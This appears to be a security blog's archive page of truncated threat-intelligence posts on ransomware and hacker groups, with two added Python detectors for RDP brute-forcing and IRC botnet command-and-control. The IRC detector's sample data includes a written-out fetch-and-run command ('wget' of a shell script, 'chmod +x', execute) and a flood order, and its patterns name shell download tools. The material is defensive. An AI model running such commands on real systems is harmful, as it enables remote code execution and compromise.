Posts

Showing posts from January, 2024

Medusa: The Ransomware

Overview
Medusa is a ransomware family first observed in 2019 (despite the similar name, it is a different family from MedusaLocker). It operates under a ransomware-as-a-service (RaaS) model and uses double extortion: the victim's data is stolen before it is encrypted. It mainly targets large organizations that hold high volumes of Personally Identifiable Information (PII), along with the healthcare and education sectors. Medusa generally gains access via brute-force attacks on Remote Desktop Protocol (RDP), leaked RDP credentials, or spear-phishing attacks that steal user credentials.

Understanding Medusa
Since its discovery, Medusa has drastically changed its ransomware activities and extortion tactics. In early 2023 the group launched a dedicated leak site, the Medusa Blog, where it publishes sensitive data of victims who do not comply with its demands. It employs a multi-extortion strategy and offers its victims several options. All the options, such as time extension, data deletion, or download of all
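
The RDP brute-force initial access described above leaves a recognisable trail in the Windows Security log, and that is where a defender would look for it. The following is an added example, not code from the original post or from any Medusa analysis: it runs a sliding-window count of failed RemoteInteractive logons (Event ID 4625, LogonType 10) per source IP over a constructed set of sample events, and records whether a later success (Event ID 4624) from the same IP followed, which is the moment a brute-force attempt turned into initial access. The event records, IP addresses, account names, threshold and window are all constructed for illustration.

```python
"""Detect RDP brute forcing in Windows Security events and whether it succeeded.

Added example; the events below are constructed, not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs follow the Windows Security log: 4625 = failed logon,
# 4624 = successful logon. LogonType 10 (RemoteInteractive) is what an
# interactive RDP session produces. Source IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"time": "2024-01-15T02:00:01", "event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": "administrator"},
    {"time": "2024-01-15T02:00:09", "event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": "admin"},
    {"time": "2024-01-15T02:00:17", "event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": "rdpuser"},
    {"time": "2024-01-15T02:00:25", "event_id": 4625, "logon_type": 3, "src_ip": "203.0.113.7", "user": "administrator"},  # network logon, not counted here
    {"time": "2024-01-15T02:00:33", "event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": "backup"},
    {"time": "2024-01-15T02:00:41", "event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": "administrator"},
    {"time": "2024-01-15T02:00:49", "event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": "rdpuser"},
    {"time": "2024-01-15T02:01:05", "event_id": 4624, "logon_type": 10, "src_ip": "203.0.113.7", "user": "rdpuser"},  # the guess that worked
    {"time": "2024-01-15T02:03:00", "event_id": 4625, "logon_type": 10, "src_ip": "198.51.100.20", "user": "jsmith"},
    {"time": "2024-01-15T02:03:30", "event_id": 4625, "logon_type": 10, "src_ip": "198.51.100.20", "user": "jsmith"},
    {"time": "2024-01-15T02:04:00", "event_id": 4624, "logon_type": 10, "src_ip": "198.51.100.20", "user": "jsmith"},  # two typos, then success
    {"time": "2024-01-15T02:05:00", "event_id": 4624, "logon_type": 10, "src_ip": "192.0.2.5", "user": "alice"},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Return one alert per source IP that produced `threshold` or more RDP
    logon failures inside `window`. If a later RDP success arrives from the
    same IP, the alert records which account got in."""
    events = sorted(events, key=lambda e: e["time"])  # ISO timestamps sort lexically
    recent = defaultdict(list)  # src_ip -> [(timestamp, user)] still inside the window
    alerts = {}
    for e in events:
        if e["logon_type"] != 10:  # only RemoteInteractive (RDP) logons
            continue
        t = datetime.fromisoformat(e["time"])
        ip = e["src_ip"]
        if e["event_id"] == 4625:
            q = recent[ip]
            q.append((t, e["user"]))
            while q and t - q[0][0] > window:  # slide the window forward
                q.pop(0)
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"src_ip": ip,
                                           "first_failure": q[0][0].isoformat(),
                                           "success_user": None,
                                           "success_time": None})
                a["failures"] = len(q)
                a["users_tried"] = sorted({u for _, u in q})
        elif e["event_id"] == 4624 and ip in alerts and alerts[ip]["success_user"] is None:
            # a success after the threshold was crossed: brute force paid off
            alerts[ip]["success_user"] = e["user"]
            alerts[ip]["success_time"] = t.isoformat()
    return [alerts[ip] for ip in sorted(alerts)]


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

In production the same logic sits on top of a SIEM query over 4625/4624 rather than a Python list, and the threshold and window need tuning to the environment. One caveat worth keeping in mind: when Network Level Authentication is enabled, failed RDP attempts are commonly recorded with LogonType 3 (network) rather than 10, so a filter on LogonType 10 alone will undercount them; the sample includes one such event to show that it is dropped by this filter.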

Threat Actor Deadeye Jackal

Overview
Deadeye Jackal, also known as the Syrian Electronic Army (SEA), Syria Malware Team, ATK 196, and TAG-CT2, is a hacker group that surfaced online in 2011 in support of Syrian President Bashar al-Assad. It has targeted many Western organizations, human rights groups, political opposition groups, and websites. It uses phishing, spamming, website defacement, malware, and denial-of-service attacks to carry out its campaigns. Government websites in the Middle East and Europe, as well as US defense contractors, have also been caught up in its hacking spree.

Syria was the first Arab country to have a public Internet army hosted on its national networks that could openly launch cyber attacks on its enemies. However, the relationship between the government and the group has since changed and is unclear at present.

Capabilities
The Deadeye Jackal group uses SilverHawk as a malware tool, which can do the following on a network or computer: record audio or

Hacker Group ShinyHunters

Overview
ShinyHunters is a criminal black-hat hacker group. It first appeared in 2020 and has carried out numerous data breaches, selling the stolen data on the dark web. Its name comes from a mechanic in the Pokemon video game franchise: a Pokemon has a rare chance of appearing in an alternate "shiny" color scheme, which players consider elusive. The group's avatar on its Twitter profile also shows a shiny Pokemon. Recently, a key member of the group, Sebastien Raoult, was arrested and pleaded guilty to his cyber crimes. The 22-year-old French national, also known as Sezyo Kaizen, was sentenced to three years in prison and ordered to pay $5 million in restitution.

Data Breaches in the Targeted Organizations
ShinyHunters has stolen large amounts of data from the following organizations and demanded a ransom from some of them: AT&T Wireless, Tokopedia, Wishbone, Microsoft, Wattpad, Pluto TV, Animal Jam, Mashable

Lockbit Ransomware

What is Lockbit Ransomware?
Lockbit is ransomware designed to block user access to computer systems. Formerly known as "ABCD" ransomware, it belongs to the 'crypto virus' class and is mostly interested in government organizations and enterprises rather than individuals. Its past targets include organizations in India, the USA, China, Indonesia, Ukraine, France, the UK, and Germany. It presumably avoids systems located in Russia or other countries within the Commonwealth of Independent States, most likely to avoid prosecution there.

Lockbit also operates as ransomware-as-a-service (RaaS): affiliates pay for access to the ransomware, carry out the attacks, and share the profits with the operators under an affiliate framework.

How does Lockbit work?
Lockbit ransomware is considered part of the "LockerGoga & MegaCortex" malware family because it shares several attributes with that group. Firstly, Lockbit exploits a weakness in the network via a phishing email or brute-force attack to get inside a n

Babuk Ransomware

About Babuk Ransomware
Discovered in 2021, Babuk ransomware is a new cyber threat that has already hit at least five large enterprises, one of which has already paid a ransom of $85,000 after negotiations. Its codebase and artifacts are highly similar to Vasa Locker, and like other ransomware operators, the group leaks stolen data on a public website. The group behind Babuk has openly expressed its hatred of the Black Lives Matter (BLM) and LGBT communities. The malware supports command-line operation and uses three different built-in commands to spread itself and encrypt network resources. Before encrypting, it checks the running processes and services and kills those on a predefined list in order to avoid detection.

Techniques Used
Babuk generally uses phishing emails to intrude into a network. The attackers send the victim an email disguised as a legitimate one, containing a malicious link or attachment. Once the attachment is opened, the malware is downloaded onto the system.

Volt Typhoon

About
Volt Typhoon is a Chinese state-backed cyber espionage group that targets legacy Cisco devices and has expanded its attack infrastructure in a sophisticated, systematic campaign. As of now, it has compromised about 30% of the legacy Cisco routers observed in a SOHO botnet that is used by multiple threat groups. It targets critical infrastructure by exploiting vulnerabilities in the victims' devices and inserting itself into them to take control.

Targets
Volt Typhoon has successfully gained access to US critical infrastructure organizations, indicating potential future disruption. The targeted sectors include water utilities, power suppliers, transportation, and communication systems in countries such as the US, the UK, and Australia.

How does Volt Typhoon work?
Initial access is achieved via internet-facing Fortinet FortiGuard devices. The group leverages whatever privileges these devices offer to extract credentials to an Active Directory accoun

Team TNT

Overview
Team TNT is a threat group known for targeting cloud and container environments globally. It abuses cloud and container resources to deploy cryptocurrency miners in victims' environments. The group has been active since 2019 and announced it was quitting in 2021. However, it seems that either it has reappeared or a copycat group, named WatchDog, is imitating its routine.

Tactics & Techniques
Team TNT has used the Tsunami malware as part of its tactics and techniques. Tsunami is a botnet that specifically targets Linux systems. It connects to its command and control (C2) server over the Internet Relay Chat (IRC) protocol. The server controls the botnet and issues commands to the infected systems. C2 runs over IRC channels, which function like chat rooms on the IRC network: every infected system joins a specific channel on the IRC server and waits for commands. The instructions might include downloading additional malware or perfor
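
The IRC C2 pattern described above (register with the server, join a channel, sit and wait for commands) is simple enough to model directly as a detection. The following is an added example, not TeamTNT's or Tsunami's code: a small parser for IRC line framing (optional ':prefix', command, space-separated parameters, optional ':trailing' text) plus per-host state tracking over a constructed capture of IRC messages, flagging hosts that register, join a channel, and then receive shell-like tasking over PRIVMSG addressed to that channel or to their own nick. Hostnames, IP addresses, the channel name and the bot command syntax are all invented for the sample; the tasking keywords are not Tsunami's real command set.

```python
"""Flag hosts behaving like IRC bots: register, join a channel, get tasked.

Added example; the messages below are a constructed capture, not real traffic.
"""
import re
from collections import defaultdict

# Payloads that read like bot tasking rather than chat: fetch-and-run of a
# script, or a "VERB target port seconds" flood order. This tasking syntax
# is invented for the sample and is not Tsunami's command set.
CMD_PATTERNS = [
    re.compile(r"(?:^|[\s;|&])(wget|curl|tftp|nohup|/bin/sh|sh -c|bash -c|chmod \+x)\b"),
    re.compile(r"\b(UDP|TCP|SYN|HTTP)\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d+\b"),
]

# (timestamp, internal host, server ip:port, direction from the host, IRC line)
SAMPLE_MESSAGES = [
    # Infected host: nick encodes the architecture, joins a channel, gets tasked.
    ("02:10:01", "10.0.0.12", "198.51.100.9:6667", "out", "NICK [x86]-183920"),
    ("02:10:01", "10.0.0.12", "198.51.100.9:6667", "out", "USER x86 localhost localhost :x86"),
    ("02:10:02", "10.0.0.12", "198.51.100.9:6667", "in", ":irc.c2.example 001 [x86]-183920 :Welcome"),
    ("02:10:02", "10.0.0.12", "198.51.100.9:6667", "out", "JOIN #tnt"),
    ("02:10:03", "10.0.0.12", "198.51.100.9:6667", "in", ":irc.c2.example PING :irc.c2.example"),
    ("02:10:03", "10.0.0.12", "198.51.100.9:6667", "out", "PONG :irc.c2.example"),
    ("02:10:40", "10.0.0.12", "198.51.100.9:6667", "in",
     ":op!op@c2.example PRIVMSG #tnt :!* SH cd /tmp; wget http://198.51.100.9/x.sh; chmod +x x.sh; ./x.sh"),
    ("02:12:10", "10.0.0.12", "198.51.100.9:6667", "in", ":op!op@c2.example PRIVMSG #tnt :!* UDP 203.0.113.50 80 60"),
    # Ordinary IRC user on the same network: registers and joins, but only sees chat.
    ("02:15:00", "10.0.0.30", "192.0.2.44:6697", "out", "NICK alice"),
    ("02:15:00", "10.0.0.30", "192.0.2.44:6697", "out", "USER alice 0 * :Alice"),
    ("02:15:01", "10.0.0.30", "192.0.2.44:6697", "out", "JOIN #python"),
    ("02:15:30", "10.0.0.30", "192.0.2.44:6697", "in", ":bob!b@example PRIVMSG #python :has anyone tried asyncio with aiohttp?"),
]


def parse_irc(line):
    """Split one IRC line into prefix, command and params using the classic
    framing: optional ':prefix', a command, space-separated params, and an
    optional ' :trailing' param that may itself contain spaces."""
    rest = line.strip()
    prefix = None
    if rest.startswith(":"):
        prefix, _, rest = rest[1:].partition(" ")
    head, sep, trailing = rest.partition(" :")
    parts = head.split()
    if not parts:
        return None
    params = parts[1:]
    if sep:
        params.append(trailing)
    return {"prefix": prefix, "cmd": parts[0].upper(), "params": params}


def detect_irc_c2(messages):
    """Return one alert per host that registered (NICK + USER), joined at
    least one channel, and then received command-like PRIVMSG text addressed
    to that channel or to its own nick."""
    state = defaultdict(lambda: {"nick": None, "user": False, "server": None,
                                 "channels": set(), "commands": []})
    for ts, host, server, direction, line in messages:
        msg = parse_irc(line)
        if msg is None:
            continue
        st = state[host]
        st["server"] = server
        cmd, params = msg["cmd"], msg["params"]
        if direction == "out":  # what the host says to the server
            if cmd == "NICK" and params:
                st["nick"] = params[0]
            elif cmd == "USER":
                st["user"] = True
            elif cmd == "JOIN" and params:
                st["channels"].update(c for c in params[0].split(",") if c.startswith("#"))
        elif cmd == "PRIVMSG" and len(params) >= 2:  # what the server delivers
            target, text = params[0], params[-1]
            if target in st["channels"] or target == st["nick"]:
                if any(p.search(text) for p in CMD_PATTERNS):
                    st["commands"].append((ts, text))
    alerts = []
    for host in sorted(state):
        st = state[host]
        if st["nick"] and st["user"] and st["channels"] and st["commands"]:
            alerts.append({"host": host, "server": st["server"], "nick": st["nick"],
                           "channels": sorted(st["channels"]), "commands": st["commands"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_irc_c2(SAMPLE_MESSAGES):
        print(alert)
```

Keying on the protocol grammar rather than on port 6667 matters because a bot can be pointed at any port; the register/join/task sequence is what distinguishes it. Keyword matching on PRIVMSG text alone would be noisy on a real IRC network, which is why the alert is gated on a completed registration and a JOIN, and in practice you would also weight nicks that encode architecture or uptime, as many IRC bots do.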

Molerats APT

Overview
Molerats is a threat group also tracked as ALUMINUM SARATOGA, Extreme Jackal, G0021, Gaza Cybergang, Gaza Hackers Team, Moonlight, and Operation Molerats. It has mainly targeted Middle East government institutions and global government organizations associated with the region's geopolitics.

It is an Advanced Persistent Threat (APT) mostly interested in Israel and Palestine, along with other parts of the Middle East. The threat actor's custom malware implant allows reconnaissance on the victim and exfiltrates data. It also uses several mechanisms to avoid automated threat analysis, including geofencing based on IP addresses, only targeting computers with Arabic language packs installed, and password-protected archive files to distribute the malware.

Main Features
Uses open-source and commercial packers for the backdoor. Targets the Middle East region. Uses the Dropbox API for all C2 communication. Uses RAR files for backdoor delivery as well as later

Tortoiseshell

Overview
Tortoiseshell is an Iranian threat actor active since at least 2018. The broader security community tracks it under the names Crimson Sandstorm (previously Curium), Imperial Kitten, TA456, and Yellow Liderc. It uses both custom and off-the-shelf malware to target IT providers in Saudi Arabia, with the ultimate goal of compromising those providers' customers. In total, 11 organizations were hit by this group, the majority based in Saudi Arabia.

It uses strategic website compromises as a way to distribute malware. In 2022 and 2023 it compromised many legitimate websites by embedding malicious JavaScript that collects details about visitors: their location, time of visit, and device information. These intrusions focused on the maritime, shipping, and logistics sectors in the Mediterranean. If a visitor is a high-value target, IMAPLoader is deployed as a follow-on payload.

Motive
This threat actor group targets IT p

Operation C-Major

Introduction
Operation C-Major is an information theft campaign targeting India. It has stolen passport scans, photo IDs, and tax information from many high-ranking Indian officers as well as non-Indian military officials based in the country. Although the attacks are highly targeted, they lack sophistication in their tools and techniques.

The threat actor generally uses malicious emails to penetrate a network. It also exploits an old vulnerability via easily traceable malware, which allows any researcher to map out its network infrastructure. Despite this sloppiness, the threat actors still managed to steal at least 16 gigabytes of data from 160 targets. The attackers are believed to be linked to Pakistan and also go after the information stored on their victims' mobile phones.

Methodology
Like other targeted attacks, Operation C-Major uses emails as its entry point. The actors gather all the information they can about their victims' interests and fav